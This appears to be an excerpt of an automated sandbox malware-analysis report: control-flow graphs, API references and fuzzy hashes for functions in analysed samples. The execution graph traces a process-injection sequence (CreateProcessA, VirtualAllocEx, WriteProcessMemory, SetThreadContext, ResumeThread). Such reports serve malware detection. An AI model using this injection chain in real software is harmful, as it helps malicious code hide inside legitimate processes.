                                                                      • Instruction Fuzzy Hash: E0415671D1438A8FC711CF79D8102AEFBF5AF89210F19856FD944A7251EB349845CBE1
                                                                      Function 02D17350 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1255 2d17350-2d173a2 1258 2d173a4-2d173a7 1255->1258 1259 2d173aa-2d173d5 DeleteFileW 1255->1259 1258->1259 1260 2d173d7-2d173dd 1259->1260 1261 2d173de-2d17406 1259->1261 1260->1261
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 02D173C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1332822293.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_2d10000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 871aa4e712663bc06725e916ee6254637a0338c75e8ccf545745371e25ea3e89
                                                                      • Instruction ID: 92377a71bbd64ebc044c4534d1e677b3bd86be087197cc1d9b1221c8439d9333
                                                                      • Opcode Fuzzy Hash: 871aa4e712663bc06725e916ee6254637a0338c75e8ccf545745371e25ea3e89
                                                                      • Instruction Fuzzy Hash: FA2158B2C0061A9FDB10CF9AD545B9EFBF4EF48320F10812AD818A7740D738A941CFA1
                                                                      Function 02D163B8 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1264 2d163b8-2d173a2 1267 2d173a4-2d173a7 1264->1267 1268 2d173aa-2d173d5 DeleteFileW 1264->1268 1267->1268 1269 2d173d7-2d173dd 1268->1269 1270 2d173de-2d17406 1268->1270 1269->1270
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 02D173C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1332822293.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_2d10000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 53d15b6ef585054a5b9661f788a5f35f21740295c49adc998333ed0ff9af1f46
                                                                      • Instruction ID: 4c96ad2f42c6f39333d2e0c0de736908cc32cbe952a626b2d04e43f4a3d9d116
                                                                      • Opcode Fuzzy Hash: 53d15b6ef585054a5b9661f788a5f35f21740295c49adc998333ed0ff9af1f46
                                                                      • Instruction Fuzzy Hash: 322147B1C0065A9BDB10DF9AD445BAEFBB4EB48320F10812AD858A7740D778A941CFA0
                                                                      Function 062FE630 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1273 62fe630-62fe66e 1274 62fe676-62fe6a4 GlobalMemoryStatusEx 1273->1274 1275 62fe6ad-62fe6d5 1274->1275 1276 62fe6a6-62fe6ac 1274->1276 1276->1275
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 062FE697
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1338662820.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_62f0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 9438befc34fec967a65ca2bd97cb9da1de7f23471436f1cc00fd5f266a3bdc82
                                                                      • Instruction ID: c2324470ba811638976d08559316f1cf7d59887cecb81660865382a5a45db64b
                                                                      • Opcode Fuzzy Hash: 9438befc34fec967a65ca2bd97cb9da1de7f23471436f1cc00fd5f266a3bdc82
                                                                      • Instruction Fuzzy Hash: 4B1123B1C1025A9FCB10DF9AC445BDEFBF4EF48320F11812AE918A7240D778A941CFA5

                                                                      Execution Graph

                                                                      Execution Coverage:10.2%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:139
                                                                      Total number of Limit Nodes:11
                                                                      execution_graph 38453 2a84668 38454 2a8467a 38453->38454 38455 2a84686 38454->38455 38457 2a84779 38454->38457 38458 2a8479d 38457->38458 38462 2a84888 38458->38462 38466 2a84878 38458->38466 38464 2a848af 38462->38464 38463 2a8498c 38463->38463 38464->38463 38470 2a8449c 38464->38470 38467 2a84888 38466->38467 38468 2a8498c 38467->38468 38469 2a8449c CreateActCtxA 38467->38469 38468->38468 38469->38468 38471 2a85918 CreateActCtxA 38470->38471 38473 2a859cf 38471->38473 38622 2a8d5c8 38623 2a8d60e 38622->38623 38627 2a8d7a8 38623->38627 38630 2a8d797 38623->38630 38624 2a8d6fb 38633 2a8bca0 38627->38633 38631 2a8d7d6 38630->38631 38632 2a8bca0 DuplicateHandle 38630->38632 38631->38624 38632->38631 38634 2a8d810 DuplicateHandle 38633->38634 38635 2a8d7d6 38634->38635 38635->38624 38474 732e7f7 38475 732e5b6 38474->38475 38476 732e634 38475->38476 38478 732fe80 38475->38478 38479 732fe9a 38478->38479 38480 732fea2 38479->38480 38494 b9605d6 38479->38494 38498 b960c4b 38479->38498 38504 b960acb 38479->38504 38509 b960a6c 38479->38509 38514 b96088c 38479->38514 38519 b960898 38479->38519 38523 b9609bb 38479->38523 38528 b9608ff 38479->38528 38532 b960c31 38479->38532 38537 b960c70 38479->38537 38543 b960b52 38479->38543 38547 b960835 38479->38547 38552 b960495 38479->38552 38480->38476 38556 732df10 38494->38556 38560 732df18 38494->38560 38495 b960604 38495->38480 38499 b960c58 38498->38499 38501 b9605a9 38498->38501 38500 b960ef2 38500->38480 38501->38500 38564 732d8c0 38501->38564 38568 732d8c8 38501->38568 38505 b9605a9 38504->38505 38505->38504 38506 b960ef2 38505->38506 38507 732d8c0 ResumeThread 38505->38507 38508 732d8c8 ResumeThread 38505->38508 38506->38480 38507->38505 38508->38505 38510 b960d1d 38509->38510 38572 732d970 38510->38572 38576 732d978 38510->38576 38511 b960d38 38515 b9609d9 38514->38515 38580 732de50 38515->38580 38584 732de58 38515->38584 38516 b9609f7 38516->38480 38521 732d970 Wow64SetThreadContext 38519->38521 38522 732d978 Wow64SetThreadContext 38519->38522 38520 b96051f 38520->38480 38521->38520 38522->38520 38524 b9605a9 38523->38524 38524->38523 38525 b960ef2 38524->38525 38526 732d8c0 ResumeThread 38524->38526 38527 732d8c8 ResumeThread 38524->38527 38525->38480 38526->38524 38527->38524 38588 732e000 38528->38588 38592 732e008 38528->38592 38529 b960921 38534 b9605a9 38532->38534 38533 b960c45 38533->38480 38534->38533 38535 732d8c0 ResumeThread 38534->38535 38536 732d8c8 ResumeThread 38534->38536 38535->38534 38536->38534 38539 b96084c 38537->38539 38538 b960c84 38539->38538 38541 732df10 WriteProcessMemory 38539->38541 38542 732df18 WriteProcessMemory 38539->38542 38540 b96086d 38541->38540 38542->38540 38545 732df10 WriteProcessMemory 38543->38545 38546 732df18 WriteProcessMemory 38543->38546 38544 b960b76 38545->38544 38546->38544 38548 b96083b 38547->38548 38550 732df10 WriteProcessMemory 38548->38550 38551 732df18 WriteProcessMemory 38548->38551 38549 b96086d 38550->38549 38551->38549 38596 732e1a0 38552->38596 38600 732e194 38552->38600 38557 732df18 WriteProcessMemory 38556->38557 38559 732dfb7 38557->38559 38559->38495 38561 732df60 WriteProcessMemory 38560->38561 38563 732dfb7 38561->38563 38563->38495 38565 732d8c8 ResumeThread 38564->38565 38567 732d939 38565->38567 38567->38501 38569 732d908 ResumeThread 38568->38569 38571 732d939 38569->38571 38571->38501 38573 732d978 Wow64SetThreadContext 38572->38573 38575 732da05 38573->38575 38575->38511 38577 732d9bd Wow64SetThreadContext 38576->38577 38579 732da05 38577->38579 38579->38511 38581 732de58 VirtualAllocEx 38580->38581 38583 732ded5 38581->38583 38583->38516 38585 732de98 VirtualAllocEx 38584->38585 38587 732ded5 38585->38587 38587->38516 38589 732e008 ReadProcessMemory 38588->38589 38591 732e097 38589->38591 38591->38529 38593 732e053 ReadProcessMemory 38592->38593 38595 732e097 38593->38595 38595->38529 38597 732e229 38596->38597 38597->38597 38598 732e38e CreateProcessA 38597->38598 38599 732e3eb 38598->38599 38601 732e19e CreateProcessA 38600->38601 38603 732e3eb 38601->38603 38604 b9611c0 38605 b96134b 38604->38605 38606 b9611e6 38604->38606 38606->38605 38609 b961438 38606->38609 38612 b961440 PostMessageW 38606->38612 38610 b961440 PostMessageW 38609->38610 38611 b9614ac 38610->38611 38611->38606 38613 b9614ac 38612->38613 38613->38606 38614 2a8ae30 38617 2a8af19 38614->38617 38615 2a8ae3f 38618 2a8af5c 38617->38618 38619 2a8af39 38617->38619 38618->38615 38619->38618 38620 2a8b160 GetModuleHandleW 38619->38620 38621 2a8b18d 38620->38621 38621->38615 38636 7305d58 38637 7305da6 DrawTextExW 38636->38637 38639 7305dfe 38637->38639 38640 732e718 38641 732e5b6 38640->38641 38642 732e634 38641->38642 38643 732fe80 12 API calls 38641->38643 38643->38642

                                                                      Executed Functions

                                                                      Function 0732E194 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 27 732e194-732e235 31 732e237-732e241 27->31 32 732e26e-732e28e 27->32 31->32 33 732e243-732e245 31->33 37 732e290-732e29a 32->37 38 732e2c7-732e2f6 32->38 35 732e247-732e251 33->35 36 732e268-732e26b 33->36 39 732e253 35->39 40 732e255-732e264 35->40 36->32 37->38 41 732e29c-732e29e 37->41 48 732e2f8-732e302 38->48 49 732e32f-732e3e9 CreateProcessA 38->49 39->40 40->40 42 732e266 40->42 43 732e2a0-732e2aa 41->43 44 732e2c1-732e2c4 41->44 42->36 46 732e2ae-732e2bd 43->46 47 732e2ac 43->47 44->38 46->46 50 732e2bf 46->50 47->46 48->49 51 732e304-732e306 48->51 60 732e3f2-732e478 49->60 61 732e3eb-732e3f1 49->61 50->44 53 732e308-732e312 51->53 54 732e329-732e32c 51->54 55 732e316-732e325 53->55 56 732e314 53->56 54->49 55->55 57 732e327 55->57 56->55 57->54 71 732e47a-732e47e 60->71 72 732e488-732e48c 60->72 61->60 71->72 73 732e480 71->73 74 732e48e-732e492 72->74 75 732e49c-732e4a0 72->75 73->72 74->75 78 732e494 74->78 76 732e4a2-732e4a6 75->76 77 732e4b0-732e4b4 75->77 76->77 79 732e4a8 76->79 80 732e4c6-732e4cd 77->80 81 732e4b6-732e4bc 77->81 78->75 79->77 82 732e4e4 80->82 83 732e4cf-732e4de 80->83 81->80 85 732e4e5 82->85 83->82 85->85
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0732E3D6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: a7e664722c43bb5740adeb08049aec33aea7c540370e88081503dce1125ec37b
                                                                      • Instruction ID: 8381e6463beb670b9594fae52bf95b515c3d79c24f5ee33d61ab45173ba95917
                                                                      • Opcode Fuzzy Hash: a7e664722c43bb5740adeb08049aec33aea7c540370e88081503dce1125ec37b
                                                                      • Instruction Fuzzy Hash: 42A160B1D0032ACFEB24DF68C8457EDBBB2BF48310F148569E819A7240DB759986DF91
                                                                      Function 0732E1A0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 86 732e1a0-732e235 88 732e237-732e241 86->88 89 732e26e-732e28e 86->89 88->89 90 732e243-732e245 88->90 94 732e290-732e29a 89->94 95 732e2c7-732e2f6 89->95 92 732e247-732e251 90->92 93 732e268-732e26b 90->93 96 732e253 92->96 97 732e255-732e264 92->97 93->89 94->95 98 732e29c-732e29e 94->98 105 732e2f8-732e302 95->105 106 732e32f-732e3e9 CreateProcessA 95->106 96->97 97->97 99 732e266 97->99 100 732e2a0-732e2aa 98->100 101 732e2c1-732e2c4 98->101 99->93 103 732e2ae-732e2bd 100->103 104 732e2ac 100->104 101->95 103->103 107 732e2bf 103->107 104->103 105->106 108 732e304-732e306 105->108 117 732e3f2-732e478 106->117 118 732e3eb-732e3f1 106->118 107->101 110 732e308-732e312 108->110 111 732e329-732e32c 108->111 112 732e316-732e325 110->112 113 732e314 110->113 111->106 112->112 114 732e327 112->114 113->112 114->111 128 732e47a-732e47e 117->128 129 732e488-732e48c 117->129 118->117 128->129 130 732e480 128->130 131 732e48e-732e492 129->131 132 732e49c-732e4a0 129->132 130->129 131->132 135 732e494 131->135 133 732e4a2-732e4a6 132->133 134 732e4b0-732e4b4 132->134 133->134 136 732e4a8 133->136 137 732e4c6-732e4cd 134->137 138 732e4b6-732e4bc 134->138 135->132 136->134 139 732e4e4 137->139 140 732e4cf-732e4de 137->140 138->137 142 732e4e5 139->142 140->139 142->142
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0732E3D6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: f5e448f6d47ddc762301220fc19cff56ea42e0050c620374a74d137a4eeff8c8
                                                                      • Instruction ID: 2ccd7dfa8fd06161ec2475415315d24f41529d20bfce2fd71af4e11bda327b49
                                                                      • Opcode Fuzzy Hash: f5e448f6d47ddc762301220fc19cff56ea42e0050c620374a74d137a4eeff8c8
                                                                      • Instruction Fuzzy Hash: 469160B1D0032ACFEB24DF68C8457DDBBB2BF48310F148569E819A7240DB759986DF91
                                                                      Function 02A8AF19 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 143 2a8af19-2a8af37 144 2a8af39-2a8af46 call 2a898a0 143->144 145 2a8af63-2a8af67 143->145 150 2a8af48 144->150 151 2a8af5c 144->151 147 2a8af69-2a8af73 145->147 148 2a8af7b-2a8afbc 145->148 147->148 154 2a8afc9-2a8afd7 148->154 155 2a8afbe-2a8afc6 148->155 198 2a8af4e call 2a8b1b0 150->198 199 2a8af4e call 2a8b1c0 150->199 151->145 156 2a8afd9-2a8afde 154->156 157 2a8affb-2a8affd 154->157 155->154 159 2a8afe9 156->159 160 2a8afe0-2a8afe7 call 2a8a270 156->160 162 2a8b000-2a8b007 157->162 158 2a8af54-2a8af56 158->151 161 2a8b098-2a8b158 158->161 164 2a8afeb-2a8aff9 159->164 160->164 193 2a8b15a-2a8b15d 161->193 194 2a8b160-2a8b18b GetModuleHandleW 161->194 165 2a8b009-2a8b011 162->165 166 2a8b014-2a8b01b 162->166 164->162 165->166 168 2a8b028-2a8b031 call 2a8a280 166->168 169 2a8b01d-2a8b025 166->169 174 2a8b03e-2a8b043 168->174 175 2a8b033-2a8b03b 168->175 169->168 176 2a8b061-2a8b06e 174->176 177 2a8b045-2a8b04c 174->177 175->174 184 2a8b070-2a8b08e 176->184 185 2a8b091-2a8b097 176->185 177->176 179 2a8b04e-2a8b05e call 2a8a290 call 2a8a2a0 177->179 179->176 184->185 193->194 195 2a8b18d-2a8b193 194->195 196 2a8b194-2a8b1a8 194->196 195->196 198->158 199->158
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02A8B17E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 8ea904a88bc5fe3221f2464e6176638f0700f50f261edf6d241c147256f1c4bc
                                                                      • Instruction ID: daea19bde7ee86adfc0d90da0e3036c715f0d4cf949b1961072342cded2d5cc9
                                                                      • Opcode Fuzzy Hash: 8ea904a88bc5fe3221f2464e6176638f0700f50f261edf6d241c147256f1c4bc
                                                                      • Instruction Fuzzy Hash: 2A814870A00B458FD724EF29D59079ABBF1FF48304F008A2ED096DBA50DB35E949CBA1
                                                                      Function 02A8449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 200 2a8449c-2a859d9 CreateActCtxA 203 2a859db-2a859e1 200->203 204 2a859e2-2a85a3c 200->204 203->204 211 2a85a4b-2a85a4f 204->211 212 2a85a3e-2a85a41 204->212 213 2a85a60-2a85a90 211->213 214 2a85a51-2a85a5d 211->214 212->211 218 2a85a42-2a85a4a 213->218 219 2a85a92-2a85b14 213->219 214->213 218->211 222 2a859cf-2a859d9 218->222 222->203 222->204
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 02A859C9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 56336606f1ad7b2e44a65c1407b3d1e572e5651417ea8d3d87d22de32881ced7
                                                                      • Instruction ID: 379778d3bd29529bd53fd5efc55e4a75e99fdb84c2e5fd1bbb2f659678c36cf9
                                                                      • Opcode Fuzzy Hash: 56336606f1ad7b2e44a65c1407b3d1e572e5651417ea8d3d87d22de32881ced7
                                                                      • Instruction Fuzzy Hash: 9841B071C0072DCBDB24DFA9C884B9DBBF5BF48314F60816AD809AB251DB756946CF90
                                                                      Function 02A8590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 223 2a8590c-2a859d9 CreateActCtxA 225 2a859db-2a859e1 223->225 226 2a859e2-2a85a3c 223->226 225->226 233 2a85a4b-2a85a4f 226->233 234 2a85a3e-2a85a41 226->234 235 2a85a60-2a85a90 233->235 236 2a85a51-2a85a5d 233->236 234->233 240 2a85a42-2a85a4a 235->240 241 2a85a92-2a85b14 235->241 236->235 240->233 244 2a859cf-2a859d9 240->244 244->225 244->226
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 02A859C9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 6fcce887c0d1c5268ad7149902ae5cfb0c71e873128569e1fc1219ba47cc4898
                                                                      • Instruction ID: 6c5cf5989744131a2c71db7e114d91ca7c68d2154a7649c335ed6f2c926c81e5
                                                                      • Opcode Fuzzy Hash: 6fcce887c0d1c5268ad7149902ae5cfb0c71e873128569e1fc1219ba47cc4898
                                                                      • Instruction Fuzzy Hash: 5941D071C00729CBEB24DFA9C884B9DBBF2BF49314F60816AD408AB255DB75694ACF50
                                                                      Function 07305D50 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 245 7305d50-7305da4 247 7305da6-7305dac 245->247 248 7305daf-7305dbe 245->248 247->248 249 7305dc0 248->249 250 7305dc3-7305dfc DrawTextExW 248->250 249->250 251 7305e05-7305e22 250->251 252 7305dfe-7305e04 250->252 252->251
                                                                      APIs
                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07305DEF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349465431.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7300000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: DrawText
                                                                      • String ID:
                                                                      • API String ID: 2175133113-0
                                                                      • Opcode ID: 4cf625133e3b3724803f65a73842a01a06f66ba73d503ffe192324f05aad4d9f
                                                                      • Instruction ID: f091257f0f8332bbf837b9cf69919db8f6f227a5236d5fbcf647b014ae6ddf73
                                                                      • Opcode Fuzzy Hash: 4cf625133e3b3724803f65a73842a01a06f66ba73d503ffe192324f05aad4d9f
                                                                      • Instruction Fuzzy Hash: D531E6B5D0034A9FDB10DF99D884ADEFBF5FB48320F14842AE819A7250D775A954CFA0
                                                                      Function 0732DF10 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 255 732df10-732df66 258 732df76-732dfb5 WriteProcessMemory 255->258 259 732df68-732df74 255->259 261 732dfb7-732dfbd 258->261 262 732dfbe-732dfee 258->262 259->258 261->262
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0732DFA8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 95a440a042dc49c81f25f1bab9d3786acef83e327a8dd70dc302e383ddaf02df
                                                                      • Instruction ID: 253810d2ab10e388466e45660ec8584882d6a2023f462b3ee08f85f7d723edd1
                                                                      • Opcode Fuzzy Hash: 95a440a042dc49c81f25f1bab9d3786acef83e327a8dd70dc302e383ddaf02df
                                                                      • Instruction Fuzzy Hash: D9217CB5D103599FDB10DFA9C885BDEBBF1FF48310F108829E918A7240C7749941CB64
                                                                      Function 0732DF18 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 275 732df18-732df66 277 732df76-732dfb5 WriteProcessMemory 275->277 278 732df68-732df74 275->278 280 732dfb7-732dfbd 277->280 281 732dfbe-732dfee 277->281 278->277 280->281
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0732DFA8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: ff4db9eb600e970f2241d472fd60431c4da448066fb346fe21e31b2addc6f811
                                                                      • Instruction ID: eaeb8a2ccc34aec2b42159a433d65bbafd75b6cd24eb288db6348467277c370f
                                                                      • Opcode Fuzzy Hash: ff4db9eb600e970f2241d472fd60431c4da448066fb346fe21e31b2addc6f811
                                                                      • Instruction Fuzzy Hash: BA2166B5D103599FDB10DFAAC881BEEBBF5FF48310F10842AE918A7240C7789941DBA4
                                                                      Function 07305D58 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 266 7305d58-7305da4 267 7305da6-7305dac 266->267 268 7305daf-7305dbe 266->268 267->268 269 7305dc0 268->269 270 7305dc3-7305dfc DrawTextExW 268->270 269->270 271 7305e05-7305e22 270->271 272 7305dfe-7305e04 270->272 272->271
                                                                      APIs
                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07305DEF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349465431.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7300000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: DrawText
                                                                      • String ID:
                                                                      • API String ID: 2175133113-0
                                                                      • Opcode ID: 574dc497bb53c608c9b4a20373896278b9fc54941d814dc047f9909b9f71bb2d
                                                                      • Instruction ID: e480aa35d003f36b315ca392f99256fba849d63c391cdb4f3faf82b84eae3419
                                                                      • Opcode Fuzzy Hash: 574dc497bb53c608c9b4a20373896278b9fc54941d814dc047f9909b9f71bb2d
                                                                      • Instruction Fuzzy Hash: 7D21D2B5D0034A9FDB10CF9AD884ADEFBF5FB48320F14842AE919A7250D775A954CFA0
                                                                      Function 0732E000 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 285 732e000-732e095 ReadProcessMemory 289 732e097-732e09d 285->289 290 732e09e-732e0ce 285->290 289->290
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0732E088
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 0908e837b1b743651c9efad38b08ec2c577d241525f0254d6d21303f4fecce61
                                                                      • Instruction ID: 68f97d0bfec3165cd45ad8718ebd33efe421db75875856a49f9a64fcd716635d
                                                                      • Opcode Fuzzy Hash: 0908e837b1b743651c9efad38b08ec2c577d241525f0254d6d21303f4fecce61
                                                                      • Instruction Fuzzy Hash: 9E213B71C003599FDB10DFAAC841BDEBBF5FF48310F508529E919A7240C7359941DBA5
                                                                      Function 0732D970 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 294 732d970-732d9c3 297 732d9d3-732da03 Wow64SetThreadContext 294->297 298 732d9c5-732d9d1 294->298 300 732da05-732da0b 297->300 301 732da0c-732da3c 297->301 298->297 300->301
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0732D9F6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: b2bd27ac0ac30f93f5e5b5e564e94e0d0ba0b6f05182f5ebd2cab353ae2b8140
                                                                      • Instruction ID: 8a7e5b8331e77f32b5243dc54f274c289b10746f41f256ab13eb485e00cf4b3b
                                                                      • Opcode Fuzzy Hash: b2bd27ac0ac30f93f5e5b5e564e94e0d0ba0b6f05182f5ebd2cab353ae2b8140
                                                                      • Instruction Fuzzy Hash: D8216AB1D103099FDB10DFAAC485BEEBBF4EF48310F10842AD459A7240CB789945CFA0
                                                                      Function 02A8BCA0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 306 2a8bca0-2a8d8a4 DuplicateHandle 308 2a8d8ad-2a8d8ca 306->308 309 2a8d8a6-2a8d8ac 306->309 309->308
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A8D7D6,?,?,?,?,?), ref: 02A8D897
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
